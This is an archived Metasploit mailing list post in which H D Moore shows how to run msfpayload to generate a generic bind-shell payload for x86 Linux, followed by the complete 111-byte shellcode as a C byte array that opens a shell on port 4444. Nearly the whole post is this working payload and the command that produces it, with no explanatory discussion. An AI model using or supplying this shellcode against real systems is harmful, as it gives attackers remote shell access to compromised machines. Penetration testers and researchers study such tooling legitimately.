Metasploit mailing list archives

msfpayload + generic payloads


From: hdm at metasploit.com (H D Moore)
Date: Mon, 17 Sep 2007 08:43:53 -0500

$ msfpayload generic/shell_bind_tcp ARCH=x86 PLATFORM=linux C
/*
 * generic/shell_bind_tcp - 111 bytes
 * http://www.metasploit.com
 * ARCH=x86, LPORT=4444, PLATFORM=linux
 */
unsigned char buf[] =
"\x31\xc9\x31\xdb\xf7\xe3\xb0\xa4\xcd\x80\x31\xc9\x31\xdb\x6a"
"\x46\x58\xcd\x80\x31\xdb\x6a\x17\x58\xcd\x80\x31\xdb\xf7\xe3"
"\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68"
"\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80"
"\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93"
"\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31"
"\xdb\x6a\x01\x58\xcd\x80";


On Monday 17 September 2007 00:03, base64 wrote:
./msfpayload generic/shell_bind_tcp R



Current thread: